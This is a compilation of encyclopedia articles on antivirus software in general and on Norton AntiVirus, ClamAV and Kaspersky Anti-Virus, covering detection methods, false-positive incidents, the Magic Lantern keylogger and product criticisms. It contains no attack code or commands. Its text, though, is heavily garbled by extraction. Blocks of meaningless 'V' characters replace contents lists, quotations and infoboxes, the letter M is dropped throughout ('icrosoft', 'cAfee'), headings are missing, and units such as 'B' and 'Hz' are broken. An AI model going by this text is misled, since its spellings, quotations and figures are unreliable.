Antivirus

c or
is used to prevent, detect, and remove computer viruses, worms,

and trojan horses. It may also prevent and remove adware, spyware, and other forms of malware. This
page talks about the software used for the prevention and removal of such threats, rather than computer
security implemented by software methods.
A variety of strategies are typically employed. Signature-based detection involves searching for known
patterns of data within executable code. However, it is possible for a computer to be infected with new
malware for which no signature is yet known. To counter such so-called zero-day threats, heuristics can
be used. One type of heuristic approach, generic signatures, can identify new viruses or variants of
existing viruses by looking for known malicious code, or slight variations of such code, in files. Some
antivirus software can also predict what a file will do by running it in a sandbox and analyzing what it does
to see if it performs any malicious actions.
No matter how useful antivirus software can be, it can sometimes have drawbacks. Antivirus software can
impair a computer's performance. Inexperienced users may also have trouble understanding the prompts
and decisions that antivirus software presents them with. An incorrect decision may lead to a security
breach. If the antivirus software employs heuristic detection, success depends on achieving the right
balance between false positives and false negatives. False positives can be as destructive as false
negatives. Finally, antivirus software generally runs at the highly trusted kernel level of the operating
system, creating a potential avenue of attack.[1]
Ô
V V
V
V
V V V
m V
VV V
m V
V
m V V V
VV V
V
m V V
V V
m V V
V V
m V
VVVV V
m VV V

V
VV
m V V
m V V
V
m V V
m V!VV
V"
V V
m V# V

V
m V
V
V
m V" V V
m VV V
V
V
VV V
V
V
V
V V
[edit]History
An example of free antivirus software:ClamTk 3.08.
j

ost of the computer viruses written in the early and mid 1980s were limited to self-reproduction and had
no specific damage routine built into the code.[2]That changed when more and more programmers
became acquainted with virus programming and created viruses that manipulated or even destroyed data
on infected computers.
There are competing claims for the innovator of the first antivirus product. Possibly the first publicly
documented removal of a computer virus in the wild was performed by Bernd Fix in 1987.[3][4]
Fred Cohen, who published one of the first academic papers on computer viruses in 1984,[5] began to
develop strategies for antivirus software in 1988[6] that were picked up and continued by later antivirus
software developers.
[7]
Also in 1988 a mailing list named VIRUS-L was started on the BITNET/EARN network where new
viruses and the possibilities of detecting and eliminating viruses were discussed. Some members of this
mailing list like John cAfee or Eugene Kaspersky later founded software companies that developed and
sold commercial antivirus software.
Before internet connectivity was widespread, viruses were typically spread by infected floppy disks.
Antivirus software came into use, but was updated relatively infrequently. During this time, virus checkers
essentially had to check executable files and the boot sectors of floppy disks and hard disks. However, as
[8]
internet usage became common, viruses began to spread online.
Over the years it has become necessary for antivirus software to check an increasing variety of files,
rather than just executables, for several reasons:
ë Powerful macros used in word processor applications, such as icrosoft Word, presented a risk.
Virus writers could use the macros to write viruses embedded within documents. This meant that
computers could now also be at risk from infection by opening documents with hidden attached
macros.[9]
ë Later email programs, in particular icrosoft's Outlook Express and Outlook, were vulnerable to
viruses embedded in the email body itself. A user's computer could be infected by just opening or
previewing a message.[10]
As always-on broadband connections became the norm, and more and more viruses were released, it
became essential to update virus checkers more and more frequently. Even then, a new zero-day
virus could become widespread before antivirus companies released an update to protect against it.
[edit]Identification methods
alwarebytes' Anti-alware version 1.46 - a proprietary freeware antimalware product
There are several methods which antivirus software can use to identify malware.
j is the most common method. To identify viruses and other malware, antivirus
software compares the contents of a file to adictionary of virus signatures. Because viruses can embed
[11]
themselves in existing files, the entire file is searched, not just as a whole, but also in pieces.
, like malicious activity detection, can be used to identify unknown viruses.
is another heuristic approach. File emulation involves executing a program in a virtual
environment and logging what actions the program performs. Depending on the actions logged, the
antivirus software can determine if the program is malicious or not and then carry out the appropriate
[12]
disinfection actions.
[edit]j
Traditionally, antivirus software heavily relied upon signatures to identify malware. This can be very
effective, but cannot defend against malware unless samples have already been obtained and signatures
created. Because of this, signature-based approaches are not effective against new, unknown viruses.
As new viruses are being created each day, the signature-based detection approach requires frequent
updates of the virus signature dictionary. To assist the antivirus software companies, the software may
allow the user to upload new viruses or variants to the company, allowing the virus to be analyzed and
the signature added to the dictionary.[11]
Although the signature-based approach can effectively contain virus outbreaks, virus authors have tried to
stay a step ahead of such software by writing "oligomorphic", "polymorphic" and, more recently,
"metamorphic" viruses, which encrypt parts of themselves or otherwise modify themselves as a method of
disguise, so as to not match virus signatures in the dictionary.[13]
[edit]
Some more sophisticated antivirus software uses heuristic analysis to identify new malware or variants of
known malware.
any viruses start as a single infection and through either mutation or refinements by other attackers, can
grow into dozens of slightly different strains, called variants. Generic detection refers to the detection and
[14]
removal of multiple threats using a single virus definition.
For example, the Vundo trojan has several family members, depending on the antivirus vendor's
classification. Symantec classifies members of the Vundo family into two distinct
[15][16]
categories,

and

.
While it may be advantageous to identify a specific virus, it can be quicker to detect a virus family through
a generic signature or through an inexact match to an existing signature. Virus researchers find common
areas that all viruses in a family share uniquely and can thus create a single generic signature. These
signatures often contain non-contiguous code, using wildcard characters where differences lie. These
[17]
wildcards allow the scanner to detect viruses even if they are padded with extra, meaningless code. A
detection that uses this method is said to be "heuristic detection."
[edit]^

Anti-virus software can also scan for rootkits; a rootkit is a type of malware that is designed to gain
administrative-level control over a computer system without being detected. Rootkits can change how
the operating system functions and in some cases can tamper with the anti-virus program and render it
ineffective. Rootkits are also difficult to remove, in some cases requiring a complete re-installation of the
operating system.[18][19]
[edit]Issues of concern
[edit]u
Some commercial antivirus software end-user license agreements include a clause that
the subscription will be automatically renewed, and the purchaser's credit card automatically billed, at the
renewal time without explicit approval. For example, cAfee requires users to unsubscribe at least 60
days before the expiration of the present subscription[20] while BitDefender sends notifications to
unsubscribe 30 days before the renewal.[21] Norton Antivirus also renews subscriptions automatically by
default.[22]
[edit]^

j
Some apparent antivirus programs are actually malware masquerading as legitimate software, such
as WinFixer and S Antivirus.[23]
[edit]

A "false positive" is when antivirus software identifies a non-malicious file as a virus. When this happens,
it can cause serious problems. For example, if an antivirus program is configured to immediately delete or
quarantine infected files, a false positive in a essential file can render the operating system or some
[24]
applications unusable. In ay 2007, a faulty virus signature issued bySymantec mistakenly removed
[25]
essential operating system files, leaving thousands of PCs unable to boot. Also in ay 2007
the executable file required by Pegasus ail was falsely detected byNorton AntiVirus as being a Trojan
[26]
and it was automatically removed, preventing Pegasus ail from running. Norton anti-virus has falsely
identified three releases of Pegasus ail as malware, and would delete the Pegasus ail installer file
[27]
when this happens. In response to this Pegasus ail stated:
" VVVV
$ VV VV
V
V V VVV
V
V VV
ë %&VV V V VV
VV VV V&V V
V VV
V
V
V
V
VV VV V
V V
&VVV '
V V
In April 2010 cAfee VirusScan detected svchost.exe, a normal Windows binary, as a virus on machines
running Windows XP with Service Pack 3, causing a reboot loop and loss of all network access.[28][29]
In December 2010, a faulty update on the AVG anti-virus suite damaged 64-bit versions of Windows 7,
rendering it unable to boot, due to an endless boot loop created.[30]
When icrosoft Windows becomes damaged by faulty anti-virus products, fixing the damage to icrosoft
Windows incurs technical support costs and businesses can be forced to close whilst remedial action is
undertaken.[31][32]
[edit]j
Running multiple antivirus programs concurrently can degrade performance and create
conflicts.[33] However, using a concept called multiscanning, several companies (including G
Data[34] andicrosoft[35]) have created applications which can run multiple engines concurrently.
It is sometimes necessary to temporarily disable virus protection when installing major updates such as
Windows Service Packs or updating graphics card drivers.[36] Active antivirus protection may partially or
completely prevent the installation of a major update.
Active anti-virus programs can cause conflicts with other programs. For example,
the TrueCrypt troubleshooting page reports that anti-virus programs are known to conflict with TrueCrypt
and cause it to malfunction.[37]
Support issues also exist around antivirus application interoperability with common solutions like SSL
VPN remote access and network access control products.[38] These technology solutions often have
policy assessment applications which require that an up to date antivirus is installed and running. If the
antivirus application is not recognized by the policy assessment, whether because the antivirus
application has been updated or because it is not part of the policy assessment library, the user will be
unable to connect.
[edit]

Studies in December 2007 showed that the effectiveness of antivirus software had decreased in the
previous year, particularly against unknown or zero day attacks. The computer magazine found that
detection rates for these threats had dropped from 40-50% in 2006 to 20-30% in 2007. At that time, the
[39]
only exception was the NOD32 antivirus, which managed a detection rate of 68 percent.
The problem is magnified by the changing intent of virus authors. Some years ago it was obvious when a
virus infection was present. The viruses of the day, written by amateurs, exhibited destructive behavior
[40]
or pop-ups. odern viruses are often written by professionals, financed by criminal organizations.
Independent testing on all the major virus scanners consistently shows that none provide 100% virus
detection. The best ones provided as high as 99.6% detection, while the lowest provided only 81.8% in
tests conducted in February 2010. All virus scanners produce false positive results as well, identifying
[41]
benign files as malware.
Although methodologies may differ, some notable independent quality testing agencies include AV-
Comparatives, ICSA Labs, West Coast Labs, VB100 and other members of the Anti-alware Testing
[42]
Standards Organization.
[edit]
ost popular anti-virus programs are not very effective against new viruses, even those that use non-
signature-based methods that should detect new viruses. The reason for this is that the virus designers
test their new viruses on the major anti-virus applications to make sure that they are not detected before
releasing them into the wild.[43]
Some new viruses, particularly ransomware, use polymorphic code to avoid detection by virus scanners.
Jerome Segura, a security analyst with ParetoLogic, explained:[44]
(V VVVVV V VVVVVV V

V
V V
V
ë VVVV
&VV VVV
)VVVV V V VVV
V' V
V
V
V V(V V V
V V &V VV
V 'V VVVV
V
V
V V(V V V VVV
VV
V
V VV
V &VV&V V (
V
V
V
VV(V
V V* VVV
VVVVVV V
VV
VV
V
V V
A proof of concept malware has shown how new viruses could use the Graphics Processing Unit (GPU)
to avoid detection from anti-virus software. The potential success of this involves bypassing theCPU in
order to make it much harder for security researchers to analyse the inner workings of such malware.[45]
[edit]^
The detection of rootkits are a major challenge for anti-virus programs. Rootkits are extremely difficult to
detect and if undetected, rootkits have full administrative access to the computer and are invisible to
users, so that they will not be shown in the list of running processes in the task manager. Rootkits can
modify the inner workings of the operating system[46] and tamper with antivirus programs.[18]
[edit]

Files which have been damaged by computer viruses are normally damaged beyond recovery. Anti-virus
software removes the virus code from the file during disinfection, but this does not always restore the file
to its undamaged state. In such circumstances, damaged files can only be restored from existing
[47]
backups.
[edit]Other methods
A command-line virus scanner, Clam AV 0.95.2, running a virus signature definition update, scanning a file and identifying a
Trojan
Installed antivirus software running on an individual computer is only one method of guarding against
viruses. Other methods are also used, including cloud-based antivirus, firewalls and on-line scanners.
[edit]Ô
Cloud antivirus is a technology that uses lightweight agent software on the protected computer, while
[48]
offloading the majority of data analysis to the provider's infrastructure.
One approach to implementing cloud antivirus involves scanning suspicious files using multiple antivirus
engines. This approach was proposed by an early implementation of the cloud antivirus concept called
CloudAV. CloudAV was designed to send programs or documents to a network cloud where multiple
antivirus and behavioral detection programs are used simultaneously in order to improve detection rates.
Parallel scanning of files using potentially incompatible antivirus scanners is achieved by spawning a
virtual machine per detection engine and therefore eliminating any possible issues. CloudAV can also
perform "retrospective detection," whereby the cloud detection engine rescans all files in its file access
history when a new threat is identified thus improving new threat detection speed. Finally, CloudAV is a
solution for effective virus scanning on devices that lack the computing power to perform the scans
themselves.[49]
[edit]

Network firewalls prevent unknown programs and processes from accessing the system. However, they
are not antivirus systems and make no attempt to identify or remove anything. They may protect against
infection from outside the protected computer or network, and limit the activity of any malicious software
which is present by blocking incoming or outgoing requests on certain TCP/IP ports. A firewall is designed
to deal with broader system threats that come from network connections into the system and is not an
alternative to a virus protection system.
[edit]r
Some antivirus vendors maintain websites with free online scanning capability of the entire computer,
critical areas only, local disks, folders or files.
[edit]j
Using rkhunter to scan for rootkits on aUbuntu Linux computer.
Virus removal tools are available to help remove stubborn infections or certain types of infection.
[50]
Examples include Trend icro's andrkhunter for the detection of rootkits, Avira's

,[51] and AVG's various virus removal tools.[52]
A rescue disk that is bootable, such as a CD or USB storage device, can be used to run antivirus
software outside of the installed operating system, in order to remove infections while they are dormant. A
bootable antivirus disk can be useful when, for example, the installed operating system is no longer
bootable or has malware that is resisting all attempts to be removed by the installed antivirus software.
Examples of some of these bootable disks include the
j [53] and
.[54] The AVG Rescue CD software can also be installed onto a USB storage device, that is bootable
on newer computers.[55]
[edit]Popularity

!

A survey by Symantec in 2009 found that a third of small to medium sized business did not use antivirus
protection at that time, whereas more than 80% of home users had some kind of antivirus installed.[56]
Norton AntiVirus
From Wikipedia, the free encyclopedia
Norton AntiVirus
V
VV
V V
VVV VV
Developer(s)
V V
Stable release VVV ! V" #$VV%

V
" #V&VV V'V(V VV
Operating system %
V ! V%
V ! V
$V ! V $V ! V)*#$V%

V+V)V
Type , V
License * V
Website

&&, V
c , developed and distributed by Symantec Corporation, provides malware prevention and removal during a
subscription period. It uses signatures and heuristics to identify viruses. Other features include e-mail spam filtering
and phishing protection.
Symantec distributes the product as a download, a box copy, and as OE software. Norton AntiVirus and Norton Internet Security,
a related product, held a 61% US retail market share for security suites as of the first half of 2007. Competitors, in terms of market
[1]
share in this study, include antivirus products from CA, Trend icro, and Kaspersky Lab.
[2]
Norton AntiVirus runs on icrosoft Windows and ac OS X. Version 17.5.0.127 is the latest Windows build. Windows 7 support is
in development for versions 2006 through 2008. Version 2009 has Windows 7 supported update already. Version 2010 natively
supports Windows 7, without needing an update. Version 11.1.1 is the latest ac build.
Ô
V- . V
V ! V V
m V V/V#V
m V VV0#V
m V VV(#V
m 0V V1V/#V
ë 0V2V V
V" V
m (V VV#V
m /V VV#V
V%
V V
V
V
m V345V
V
m V6 V7VV !V
m V*
V V
m 0V3V V
m (V6 V
m /V5
8 V!V9V
m V*53 :V
m V V
V
0VV V
(V;
V
/V":V7 V
[edit]Windows edition
[3]
In August 1990 Symantec acquired Peter Norton Computing from Peter Norton. Norton and his company developed various
utilities, or applications for DOS, including an antivirus. Symantec continued the development of acquired technologies. The
technologies are marketed under the name of "Norton", with the tagline "from Symantec". Norton's crossed-arm pose, a registered
[4]
U.S. trademark, was traditionally featured on Norton product packaging. However, his pose was later moved to the spine of the
[5]
packaging, and eventually dropped altogether.
Product activation was introduced in Norton AntiVirus 2004, addressing the estimated 3.6 million counterfeit Norton products sold.
An alphanumeric code is generated to identify a computer's configuration, which ties in with the product key. Users are allowed to
[6]
activate their product five times with the same product key. Spyware and adware detection and removal was introduced to the
[7]
2005 version, with the tagline "Antispyware Edition". The tagline was dropped in later releases. However, Norton AntiVirus 2009
Classic does not include spyware or adware detection. The Classic edition is marketed alongside Norton AntiVirus 2009, which does
include spyware and adware detection.
Existing users of the 2006, 2007, 2008 and 2009 versions can upgrade to the latest 2010 version without buying a new subscription.
[

][8]
Upgrading will preserve the number of days left on a user's subscription.
[edit] !"#$

[9]
The redesigned main graphical user interface aggregates information in a central user interface. CNET reports the Norton
Protection Center, while useful, attempts to advertise additional products. To further facilitate detection of zero-day malware,
Bloodhound disassembles a variety of programming languages, and scans code for malicious instructions using
[10]
predefined algorithms. Internet Explorer homepage hijacking protection was introduced in this release as well; however notably
missing is search engine hijacking protection. CNET highlighted Norton AntiVirus 2006's noticeable impact on system
[9]
performance.
Operating system requirements call for Windows 2000 Service Pack 3 or Windows XP. 150 B of free space and a 300 Hz
processor is required under either operating system. 128 B of RA is required under Windows 2000, while 256 B is required in
[9]
Windows XP.
[edit] % !&#$

[11]
Norton AntiVirus was released on September 12, 2006. Symantec revised Norton AntiVirus with the goal of reducing high system
[12]
resource utilization. Windows Vista compatibility was introduced in this release as well. Despite having about 80% of the code
[13]
rewritten, CNET reports mixed results in performance testing. New features include a tabbed interface, eliminating the need to
[13]
have separate windows open for the Norton Protection Center and for configuring the settings. Symantec extended
its Veritas VxS rootkit detection technology, allowing Norton AntiVirus 2007 to inspect files within directories to files on the volume
[13]
level, detecting abnormalities or inconsistencies.
Windows 2000 compatibility was dropped from this release. Compatibility with 32-bit versions of Windows Vista was added to this
release with a patch from Symantec. Hardware requirements under Vista call for 150 B free space, a 800 Hz processor and 512
B RA. Requirements under Windows XP similarly call for 150 B free space, a 300 Hz processor, and 256 B of RA.
[edit] ' !(#$

Norton AntiVirus 2008 was released on August 28, 2007. Emphasizing malware prevention, new features include SONAR, which
looks for suspicious application behavior. This release adds real-timeexploit protection, preventing attackers from leveraging
[14][15]
common browser and application vulnerabilities.
When installed in 32-bit versions of Windows XP Service Pack 2, 300 B of free space, a 300 Hz processor, and 256 B of RA
is required. When installed in 32-bit and 64-bit versions of Windows Vista, 300 B of free space, a 800 Hz processor, and 256 B
of RA is needed.
[edit] ) !#$
The main user interface of Norton AntiVirus 2009
Norton AntiVirus 2009 was released on September 8, 2008. Addressing performance issues, over 300 changes were made, with a
[16][17]
"zero-impact" goal. Benchmarking conducted by Passmark Software PTY LTD highlights its 47 second install time, 32 second
scan time, and 5 B memory utilization. It should be noted Symantec funded the benchmark test and provided some scripts used to
[18]
benchmark each participating antivirus software.
The security status and settings are now displayed in a single main interface. A CPU usage monitor displays the total CPU
utilization and Norton's CPU usage in the main interface. Other features include Norton Insight, a whitelisting technology which cuts
[19]
scanning times by mapping known safe files using information from an online database. To address malware response times,
updates are delivered updates 5 to 15 minutes. However, such updates are not tested by Symantec, and may cause false positives,
or incorrectly identify files as malicious. The exploit scanner found in the 2007 and 2008 versions was dropped from this release.
When installed in 32-bit versions of Windows XP Service Pack 2, 150 B of free space, a 300 Hz processor, and 256 B of RA
is required. When installed in 32-bit or 64-bit versions of Windows Vista, 150 B of free space, a 800 Hz processor, and 512 B
of RA is required.
ï "Ú

Two variations on Norton AntiVirus 2009 are also marketed by Symantec. The Gaming edition provides finer control over when
Norton downloads updates and allows components of the suite to be disabled either manually or automatically when the computer
enters full-screen mode.
The Classic edition cannot find or remove adware and spyware.
[edit] ! !%#$

The main GUI of Norton AntiVirus 2010
[20]
Version 17.0 was released on September 9, 2009. Several features have been updated in this release, including SONAR, now
dubbed SONAR 2. It now uses more information to determine if an application is truly malicious. Norton Insight can present users
[20]
with information about the origins, activities, and performance of applications along with reputation data. A new feature
codenamed helps users understand what Norton did when malware was found. Previous releases removed threats on sight
and quietly warned users, potentially confusing when users are deceived in downloading rogue security software. uch of this
[21]
information is placed on the back of the main window; a toggle button switches between the sides. Symantec has also added
Windows 7 support. Aside from that, Symantec has also added the Norton Download Insight to prevent drive by drive downloads.
[edit] !! !'#$
The main GUI of Norton AntiVirus 2011
Norton AntiVirus 2011 Beta was released on April 21, 2010. Changes include a new user interface and improved scanning of
internet sites for malware. With the 2011 version, Symantec also released an application that "scans" the user's Facebook feed for
[22]
any malware links. This application does not require a valid subscription. The final version of Norton AntiVirus 2011 was released
on August 31, 2010.
[edit]acintosh edition
Norton AntiVirus 11 for ac introduced support for ac OS X v10.5 Leopard platform, with the capability to detect both acintosh
and Windows malware. Other features include a vulnerability scanner, which blocks attackers from leveraging software
[23]
exploits. Norton AntiVirus 11 also includes the ability to scan within compressed or archived files, such as Time Capsule volumes.
[24]
Operating requirements call for ac OS X Tiger. A PowerPC or an Intel Coreprocessor, 128 B of RA, and 100 B of free hard
disk space are also required. Norton AntiVirus Dual Protection for ac is intended for acintosh users with Windows running on
their systems, using Boot Camp or virtualization software such as VWare Fusion. It provides a license for both Norton AntiVirus 11
[25][26]
with Norton AntiVirus 2009.
[edit]Criticisms
[edit]*+
The FBI confirmed the active development of agic Lantern, a keylogger intended to obtain passwords to encrypted e-mail and
other documents during criminal investigations. agic Lantern was first reported in the media by Bob Sullivan of SNBC on 20
[27][28]
November 2001 and by Ted Bridis of the Associated Press. The FBI intends to deploy agic Lantern in the form of an e-mail
attachment. When the attachment is opened, it installs a trojan horse on the suspect's computer, which is activated when the
suspect uses PGP encryption, often used to increase the security of sent e-mail messages. When activated, the trojan will log the
[29][30]
PGP password, which allows the FBI to decrypt user communications. Symantec and other major antivirus vendors have
whitelisted the agic Lantern trojan, rendering their antivirus products, including Norton AntiVirus, incapable of detecting it.
Concerns around this whitelisting include uncertainties about agic Lantern's full surveillance potential and whether hackers could
[31][32]
subvert it and redeploy it for purposes outside of law enforcement.
Graham Cluley, a technology consultant from Sophos, said "We have no way of knowing if it was written by the FBI, and even if we
[33]
did, we wouldn¶t know whether it was being used by the FBI or if it had been commandeered by a third party". Another reaction
came from arc aiffret, chief technology officer and cofounder of eEye Digital Security who states: "Our customers are paying us
for a service, to protect them from all forms of malicious code. It is not up to us to do law enforcement's job for them so we do not,
[34]
and will not, make any exceptions for law enforcement malware or other tools."
Proponents of agic Lantern argue the technology would allow law enforcement to efficiently and quickly decrypt time-sensitive
messages protected by encryption schemes. Implementing agic Lantern does not require physical access to a suspect's
computer, unlike Carnivore, a predecessor to agic Lantern, since physical access to a computer would require a court
[35]
order. FBI spokesman Paul Bresson, in response to a question about whether agic Lantern also needed a court order to deploy,
would only say "Like all technology projects or tools deployed by the FBI it would be used pursuant to the appropriate legal
[36][37]
process."
[edit]u

The January 28, 2010 Symantec Anti-virus update marked Spotify as a Trojan horse disabling the software across millions of
PCs. [1] [2]
[edit]

Retail customers report slow and indifferent service on bugs. Examples include a faulty error message stating current subscriptions
[38]
had expired. Users received an error stating "Your virus protection cannot be updated." This error occurred after an update to the
[38]
software and refused to allow daily updates. Though the bug was reported in 2004, it was not corrected for the 2005 or 2006
versions.
Another incident occurred in ay 2007, when Norton Antivirus flagged components of the Pegasus e-mail client as malicious,
[39]
rendering the program corrupted. Symantec customer service addressed the problem by running through a checklist of
troubleshooting steps which were not always successful.
[edit]
On July 25, 2006, Symantec released a faulty update for Norton AntiVirus 2006 users. Users reported an onscreen message stating
[40]
"Norton AntiVirus 2006 does not support the repair feature. Please uninstall and reinstall.". Symantec claimed the faulty update
was downloaded to customers between 1:00 P and 7:00 P on July 25, 2006. Symantec developed a workaround tool and has
listed troubleshooting steps, available here. The company released a statement, stating they expected to deliver a repair patch to
[41]
affected users by onday, July 31, 2006."
[edit]u
[42][43]
Norton AntiVirus has been criticized for refusing to uninstall completely, leaving unnecessary files behind. Another issue is
versions prior to 2009 installed LiveUpdate, which updates Norton-branded software, separately. The user must uninstall both
Norton AntiVirus and the LiveUpdate component manually. The LiveUpdate component is purposely left behind to update other
[44]
Norton-branded products, if present. In response, Symantec developed the Norton Removal Tool to remove leftover registry keys
[45]
and values along with files and folders. However, neither route of uninstallation will remove subscription data, preserved to
prevent users from installing multiple trial copies.
[edit]+ ,- c

Norton AntiVirus 2007 will not install alongside ZoneAlarm. This incompatibility has caused annoyance for Norton customers who
[46]
purchased Norton AntiVirus 2007 with no prior warning or notice of the incompatibility. Symantec recommends removing
ZoneAlarm, then reinstalling it with its Internet Worm Protection feature disabled, which controls what applications can access the
Internet and which protocols they can use to do so.
[edit]+.j#
On arch 9, 2009, some users of Norton AntiVirus 2006 and 2007 experienced a firewall warning stating a Norton-associated file,
[47]
"PIFTS.exe", was trying to connect to the Internet. Although this file was revealed to be a harmless diagnostic patch, the program
gained attention in the media when Symantec removed posts from their forum concerning PIFTS. With no information available
[48]
about the purpose of the program there was speculation that the program was malware or a backdoor.
The SANS Internet Storm Center claimed to have spoken to a Symantec employee who has confirmed that "the program is theirs,
[49]
part of the update process and not intended to do harm." Graham Cluley, a consultant from antivirus vendor Sophos found PIFTS
[50]
connected to a Symantec server, forwarding product and computer information.
On arch 10, Symantec made an official response to the PIFTS program, claiming posts in the support forum were deleted due
[51]
to forum spam rules; however the deletion of PIFTS-related posts began before the spam attacks. Symantec stated PIFTS itself
[48]
was a diagnostic patch. Cole stated the purpose of the update was to help determine how many customers would need to be
migrated toWindows 7-compatible versions of Norton AntiVirus. PIFTS apparently was released without a digital signature to verify
[52]
its identity, causing firewalls to prompt for permission when it attempted to connect to the Internet.
[edit]Ô

Symantec has been criticized for many ethical violations, mainly in its India support branch, whereby support technicians would tell
customers inquiring about certain issues that their systems were infected and therefore needed a technician to remove it remotely
[53]
for an extra fee of 99 euros, and refuse to refund when, as in almost all cases, their systems were not infected.
Clam AntiVirus
Ôlam AntiVirus
V
VV1/$VVV V $V
VVV V
VV <VVV
=V
-.
Developer(s) >V?< V
-.
Stable release 1 V&V38V$V'VV VV
Preview release 1V&V@V($V'VV VV
Operating system = V
Type , V ! V
License 26V2V*8
VA
V
Website B&&!!!

,& V
Ôc (Ôc) is a free, cross-platform antivirus software tool-kit capable of detecting many types
of malicious software, including viruses. One of its main uses is on mail servers as a server-side email
virus scanner. The application was developed for Unix and has third party versions available for AIX, BSD, HP-
UX, Linux, ac OS X, OpenVS, OSF and Solaris. As of version 0.96 ClamAV builds and runs on icrosoft
Windows.[3][4]Both ClamAV and its updates are made available free of charge.
Sourcefire, a maker of intrusion detection products and the owner of Snort, announced on 17 August 2007 that
it had acquired the trademarks andcopyrights to ClamAV from five key developers.[5]
Ô
V- . V
V3 V
V"
, V
V* V
m VA:$V4CV
m V%
V+V)V
m V+ %V
m 0V ! V
0V2
V
V
m 0VV
(V*V! V
/VV V
V;
V
V3V V
1V":V7 V
[edit]Features
ClamAV includes a number of utilities: a command-line scanner, automatic database updater and a scalable
multi-threaded daemon, running on an anti-virus engine from a shared library.[3]
The application also features a ilter interface for sendmail and on-demand scanning. It has support for Zip,
RAR, Tar, Gzip, Bzip2, OLE2, Cabinet, CH, BinHex, SIS formats, most mail file formats, ELF executables
and Portable Executable (PE) files compressed with UPX, FSG, Petite, NsPack, wwpack32, EW, Upack and
obfuscated with SUE, Y0da Cryptor. It also supports many document formats, including icrosoft
Office, HTL, Rich Text Format (RTF) and Portable Document Format (PDF).[3]
The ClamAV virus database is updated several times each day and as of 21 August 2010 contained 818,106
virus signatures.[3][6]
[edit]Effectiveness
V
V VoutdatedV* V V V
VV
V
V, VV!V
,8VV* V VV7V VVVVå
V
V
ClamAV sometimes suffers from poor detection rates and its scans are slow and less effective than some other
antivirus programs (such as Avast! or AVG). For example, ClamAV failed to detect almost half of the Trojan
horse, password stealers, and other malware in AV-Test.org's "zoo" of malware samples.[7]
ClamAV is occasionally included in comparative tests against other antivirus products. In the 2008 AV-Test it
rated: on-demand: very poor, false positives: poor, on-access: poor, response time: very good, rootkits: very
poor[8] In 2007 Untangle ranked Clam 2nd out of 10, ahead of Symantec, F-Prot, Sophos, cAfee, GlobalHauri,
Fortinet and SonicWall.[9] In the 1±21 June 2008 test performed by Virus.gr, ClamWin version 0.93 detected
54.68% of all threats and ranked 37th out of 49 products tested; the best scored over 99%.[10] In the 10 August-
5 September 2009 test performed by Virus.gr, ClamWin version 0.95.2 detected 52.48% of all threats and
ranked 43 out of 55 products tested; the best scored 98.89%.[11]
[edit]Platforms
[edit]V /*j
ClamAV is available for Linux and BSD-based operating systems.[3] In most cases it is available through the
distribution's repositories for installation.
On Linux servers ClamAV can be run in daemon mode, servicing requests to scan files sent from other
processes. These can include mail exchange programs, files on Samba shares, or packets of data passing
through a proxy server (IPCop, for example, has an add-on called Copfilter which scans incoming packets for
malicious data).
On Linux and BSD desktops ClamAV provides on-demand scanning of individual files, directories or the whole
PC.[3]
[edit]0rj1
Apple ac OS X Server has included ClamAV since version 10.4. It is used within the operating system's email
service. A graphical user interface is available in the form of #.[12] Additionally,Fink and acPorts have
ported ClamAV to the platform too.
Another program which uses the ClamAV engine, on ac OS X, is Counteragent. Working alongside
the Eudora Internet ail Server program, Counteragent scans emails for viruses using ClamAV and also
optionally provides spam filtering through SpamAssassin.
[edit]r 0j
ClamAV for OpenVS is available for DEC Alpha and Itanium platforms. The build process is simple and
provides basic functionality, including: library, clamscan utility, clamd daemon and freshclam for update.[13]
[edit]2
ClamAV for Windows is a joint project of ClamAV and Immunet which provides support for Windows XP, Vista,
and 7. Unlike ClamWin it includes on-access scanning accomplished through cloud computing, which reduces
the use of local PC memory.[14]
[edit]Graphical interfaces
Since ClamAV does not include a graphical user interface (GUI) but instead is run from the command line, a
number of third-party developers have written GUIs for the application for various platforms and uses.
These include:
ClamTk 4.08 running on Ubuntu 9.04 Jaunty Jackalope
ë Linux
ë ClamTk using gtk2-perl. The project takes its name from the Tk libraries that were used when it was
first started.[15][16]
ë KlamAV for KDE[17]
ë wbmclamav is a webmin module[18] to manage Clam Antivirus
ë ac OS X
ë ClamXav is a freeware port which includes a graphical user interfaces and has a "sentry" service
which can watch for changes or new files in many cases. There is also an update and scanning
scheduler through a cron job facilitated by the graphical interface. ClamXav can detect ac OS X-
specific malware, as well as Unix-specific and Windows-specific malware, but the malware definitions
for ac OS X are not updated as often, with sometimes as much as a year passing between updates.
However, the ClamXav application and the ClamAV engine, are updated regularly.[19]
ë Tiger Cache Cleaner is shareware software which installs and presents a graphic interface for using
ClamAV to scan for viruses, as well as providing other unrelated functions.
ë icrosoft Windows
ë ClamWin
ë Graugon AntiVirus[20]
ë CS Antivirus[20]
ë oon Secure AV[21]
ë Spyware Terminator[22]
ë iscellaneous
ë Untangle is an open source network gateway that uses ClamAV in its application.[23]
[edit]Ô2
ClamWin running on Windows XP

$
ClamWin is a graphical user interface front end for ClamAV for icrosoft Windows built by ClamWin Pty Ltd.
Features include
%
(user started) scanning, automatic updates, scan scheduling, context menu
integration to Explorer, and an add-in for icrosoft Outlook. To provide on-access scanning(scan when a file is
read or written), additional software must be used. Examples are Clam Sentinel and the free
software called Winpooch.
Plugins for ozilla Firefox which use ClamWin to scan downloaded files are also available.[24][25] Several other
extensions allow the users to process downloaded files with any software and scan the files with
ClamWin.[26][27][28][29]
[edit]Patent lawsuit
Barracuda Networks is being sued by Trend icro as of 2008 for its distribution of ClamAV as part of a security
package.[30] Trend icro claims that Barracuda's utilization of ClamAV infringes on a software patent for filtering
viruses on an Internet gateway. The free software community has responded in part by calling for
a boycott against Trend icro. The boycott has been endorsed by the Free Software Foundation.[31] Barracuda
Networks counter-sued with IB obtained patents in July of 2008. [32]
Kaspersky Anti-Virus
6aspersky Anti-Virus
V
? 7V= VV, V#VV ! VV
Developer(s) ? 7VA8 V
Stable release V0#V&VV@V'V/V VV
Operating system %
V ! $V%
$VA:V
Type , V
License * V
Website !!!7 7

V
6c (Russian: Ⱥɧɬɢɜɢɪɭɫ Ʉɚɫɩɟɪɫɤɨɝɨ; formerly known as

&; often
referred to as 6c) is an antivirusprogram developed by Kaspersky Lab. It is designed to protect users
from malware and is primarily designed for computers running icrosoft Windows and ac OS X, though a
version for Linux is available for business consumers.
Ô
V- . V
V3 V
V! V
VA V
0V%
V
(VA:V V
/V VD V
V
V! V
VV V
1V;
V
V":V7 V
Features
Kaspersky Anti-Virus features include real-time protection, detection and removal

